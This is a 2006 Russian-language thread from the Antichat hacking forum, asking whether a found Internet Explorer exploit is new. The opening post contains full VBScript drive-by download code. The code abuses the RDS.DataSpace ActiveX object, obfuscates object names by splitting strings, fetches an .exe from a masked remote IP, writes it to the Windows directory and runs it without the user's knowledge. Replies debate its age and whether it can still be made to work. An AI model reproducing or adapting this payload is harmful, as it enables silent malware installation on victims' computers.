ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу Новый эксплоит для Ie?
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Новый эксплоит для Ie?
  #1  
Старый 20.11.2006, 23:53
Аватар для ReanimatoR
ReanimatoR
Участник форума
Регистрация: 27.08.2006
Сообщений: 223
Провел на форуме:
2154209

Репутация: 341
Отправить сообщение для ReanimatoR с помощью ICQ
По умолчанию Новый эксплоит для Ie?
Код:
<SCRIPT language="VBScript"> If navigator.appName="Microsoft Internet Explorer" Then If InStr(navigator.platform,"Win32") <> 0Then Dim Obj_Name Dim Obj_Prog set obj_RDS = document.createElement("object") obj_RDS.setAttribute "id", "obj_RDS" obj_RDS.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36" fn = "7265499976.exe" Obj_Name = "S" & "h" & "e" & "l" & "l" Obj_Prog = "A" & "p" & "pl" & "i" & "ca" & "ti" & "on" set obj_ShellApp = obj_RDS.CreateObject(Obj_Name & "." & Obj_Prog,"") Set oFolder = obj_ShellApp.NameSpace(20) Set oFolderItem=oFolder.ParseName("Symbol.ttf") Font_Path_Components=Split(oFolderItem.Path,"\",-1,1) WinDir= Font_Path_Components(0) & "\" &Font_Path_Components(1) & "\" fn=WinDir & fn Obj_Name = "Mi" & "cr" & "osoft" Obj_Prog = "X" & "M" & "LHTT" & "P" set obj_msxml2 = CreateObject(Obj_Name & "." & Obj_Prog) obj_msxml2.open "G" & "E" & "T","http://**.***.***.***/part/joke.exe",False  obj_msxml2.send On Error Resume Next Obj_Name = "AD" & "ODB" Obj_Prog = "St" & "rea" & "m" set obj_adodb = obj_RDS.CreateObject(Obj_Name & "." & Obj_Prog,"") If Err.Number Then Obj_Name = "S" & "c" & "ript" & "ing" Obj_Prog = "F" & "i" & "leSy" & "ste" & "mO" & "bject" Set obj_FileSys=obj_RDS.CreateObject(Obj_Name & "." & Obj_Prog,"") Set download_file=obj_FileSys.CreateTextFile(fn, TRUE) download_file_size=LenB(XMLBody) For i=1 To download_file_size cByte=MidB(XMLBody,i,1) ByteCode=AscB(cByte) download_file.Write(Chr(ByteCode)) Next download_file.Close Obj_Name = "W" & "Sc" & "r" & "ipt" Obj_Prog = "Sh" & "e" & "l" & "l" Set obj_WShell=obj_RDS.CreateObject(Obj_Name & "." & Obj_Prog,"") On Error Resume Next obj_WShell.Run fn,1,FALSE  Else obj_adodb.Type=1 obj_adodb.Open obj_adodb.Write(obj_msxml2.responseBody) obj_adodb.SaveToFile fn,2 obj_ShellApp.ShellExecute fn End If End If End If </SCRIPT>'
там немногоо воды есть, но вроде ноорм... Вот нашел в инете=) просто оч внимательный...=) славу богу ослом не пользуюсь.
Вроде на багтраке этой штуки не видел...
----
Я так понял что она закачивает и исполняет файл без ведома пользователя(если браузер Ie)...
 
Ответить с цитированием

  #2  
Старый 20.11.2006, 23:59
Аватар для SladerNon
SladerNon
Banned
Регистрация: 06.03.2005
Сообщений: 1,645
Провел на форуме:
7298807

Репутация: 901


По умолчанию
ReanimatoR

А с чего ты взял что это новый эксплоит?.

Цитата:
Вроде на багтраке этой штуки не видел...
Сможешь ли ты отличить код сплоита с уязвимостью в WebViewFolderIcon от кода с XML к примеру?
Ответь пожалуйста на вопрос
 
Ответить с цитированием

  #3  
Старый 21.11.2006, 17:38
Аватар для x3r0n
x3r0n
Banned
Регистрация: 18.11.2006
Сообщений: 3
Провел на форуме:
5073

Репутация: 0
По умолчанию
Чета у меня ниче не происходит...
Линк сменил...
 
Ответить с цитированием

  #4  
Старый 21.11.2006, 18:09
Аватар для ground_zero
ground_zero
Постоянный
Регистрация: 11.10.2006
Сообщений: 659
Провел на форуме:
1594033

Репутация: 216


По умолчанию
как теоретик скажу что впечатлён твоей находкой как практик что данный эксплойт неактуален
 
Ответить с цитированием

  #5  
Старый 21.11.2006, 19:42
Аватар для ReanimatoR
ReanimatoR
Участник форума
Регистрация: 27.08.2006
Сообщений: 223
Провел на форуме:
2154209

Репутация: 341
Отправить сообщение для ReanimatoR с помощью ICQ
По умолчанию
Цитата:
Сообщение от SladerNon  
ReanimatoR

А с чего ты взял что это новый эксплоит?.



Сможешь ли ты отличить код сплоита с уязвимостью в WebViewFolderIcon от кода с XML к примеру?
Ответь пожалуйста на вопрос
ну блин=) проясни тогда плз что делает этот код?) лично я не разобрался
 
Ответить с цитированием

  #6  
Старый 21.11.2006, 21:05
Аватар для x3r0n
x3r0n
Banned
Регистрация: 18.11.2006
Сообщений: 3
Провел на форуме:
5073

Репутация: 0
По умолчанию
2 ground_zero
Реально сделать чтоб он работал?
 
Ответить с цитированием

  #7  
Старый 21.11.2006, 22:28
Аватар для ReanimatoR
ReanimatoR
Участник форума
Регистрация: 27.08.2006
Сообщений: 223
Провел на форуме:
2154209

Репутация: 341
Отправить сообщение для ReanimatoR с помощью ICQ
По умолчанию
все понял=) эта штука уже старая=) но пашет... загружает в комп ехе и исполняет его без ведома пользователя=) правда хз под какую версию Ie
 
Ответить с цитированием

  #8  
Старый 21.11.2006, 22:56
Аватар для GreenBear
GreenBear
наркоман с медалью
Регистрация: 07.05.2005
Сообщений: 3,704
Провел на форуме:
19975136

Репутация: 4536


Отправить сообщение для GreenBear с помощью ICQ
По умолчанию
9.0
 
Ответить с цитированием

  #9  
Старый 22.11.2006, 04:52
Аватар для ground_zero
ground_zero
Постоянный
Регистрация: 11.10.2006
Сообщений: 659
Провел на форуме:
1594033

Репутация: 216


По умолчанию
to x3r0n да реально ноя уже на эту багу выкладывал заплатку в теме Os - моя крепость
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
О законе. _-[A.M.D]HiM@S-_ Статьи 28 01.11.2007 12:25
Софт для мобильных телефонов под *nix Grrl Сотовый фрикинг 2 02.03.2007 01:47
Редактирование содежимого прошивок для Самсунгов Digimortal Схемы и программы 3 28.02.2007 14:22



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ